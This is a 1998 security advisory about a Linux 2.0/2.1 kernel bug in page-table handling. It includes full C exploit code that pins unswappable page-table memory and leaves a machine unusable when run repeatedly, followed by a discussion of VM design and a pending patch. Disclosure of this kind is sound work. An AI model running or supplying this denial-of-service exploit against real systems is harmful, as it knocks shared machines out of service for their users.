COMMAND

    PTE

SYSTEMS AFFECTED

    Linux 2.0.x, 2.1.?

PROBLEM

    Sed found following.  The idea is to take a lot of memory.  So, we
    map all our virtual  pages, to force the  system to allow all  the
    pte  (am  talking  about  PC  box).   So,  the  process  will have
    allocated 768 pages that will never be swapped (that's the crucial
    point).

    So, that's simple, you run program below as much time as you  need
    to take all the  memory, and the PC  won't be usable anymore  (for
    tested 64Mb box, about 20 times  were enough).  And then, you  can
    have a wonderful  light-show with your  HD-led (PC will  spend its
    time in swapping).  Exploit follows:

    /* the pte bug - Sed hacking linux kernel, 24 may 1998 */

    unsigned long address;
    int touch_me;
    int fd;

    #include <signal.h>
    #include <unistd.h>
    #include <sys/mman.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>

    void the_handler(int x)
    {
      signal(SIGSEGV, the_handler);

      touch_me++;

      if(mmap((void *)address, 4, PROT_READ,
	    MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
	perror("mmap");
	exit(1);
      }
    }

    void main(void)
    {
      /* volatile to fool GCC, we _WANT_ access *address */
      volatile unsigned long i;

      fd=open("pte.c", O_RDONLY);
      if (fd==-1) {
	perror("open");
	exit(1);
      }

      signal(SIGSEGV, the_handler);

      /* 3*1024*1024*1024 = TASK_SIZE,
       * 1024*4096 = number of bytes one pte can map */
      for (address=0; address<3*1024*1024*1024; address+=1024*4096) {
	i=*(unsigned long *)address;
	if (touch_me) {
	  touch_me=0;
	  munmap((void *)address, 4);
	}
      }

      while(1)
	pause();
    }

SOLUTION

    We could swap the  pgd / pmd /  pte, but real question  isif it is
    possible or you  want something like  lazy page table  allocation.
    The Linux VM code has a  "flat" model, whereas Mach VM (the  basis
    of  the  VM  system  used  by  4.4BSD and its derivatives) and UVM
    (NetBSD's new  VM system)  have a  2-layer model;  the upper layer
    holds mappings  that can  coalesce to  save space,  and the  lower
    layer holds the (redundant) physical mappings (in the format  used
    by the MMU/software TLB reload engine/whatever).  This lower layer
    is  able  to  allocate  page  tables  or  other  physical  mapping
    resources  "lazily",  as  mappings  for  actual physical pages are
    entered by  the upper  layer.   This lower  layer is  also free to
    "forget" mappings  at any  time, so  when memory  is in  extremely
    short supply, the  page tables can  simply be freed  to the system
    (and that process's  page table base  pointer set to  some default
    empty page table), and when that process runs again, the  mappings
    are simply  rebuilt as  the page  faults occur  from the (compact)
    info stored in the upper layer.

    The setrlimit will not work to  prevent this.  You can only  limit
    the number of  processes a person  can launch, to  limit the havoc
    they can cause.   The bug stems  from the way  Linux manages  PGD,
    PMD, and  PTE structures.   At this  time, Linux  only deallocates
    PTEs when it frees  page ranges.  PMD  and PGD structures are  not
    checked for use when entries are freed from them.

    Perry Harrington is working on a patch against 2.1 series kernels,
    which will be backported to the 2.0 series.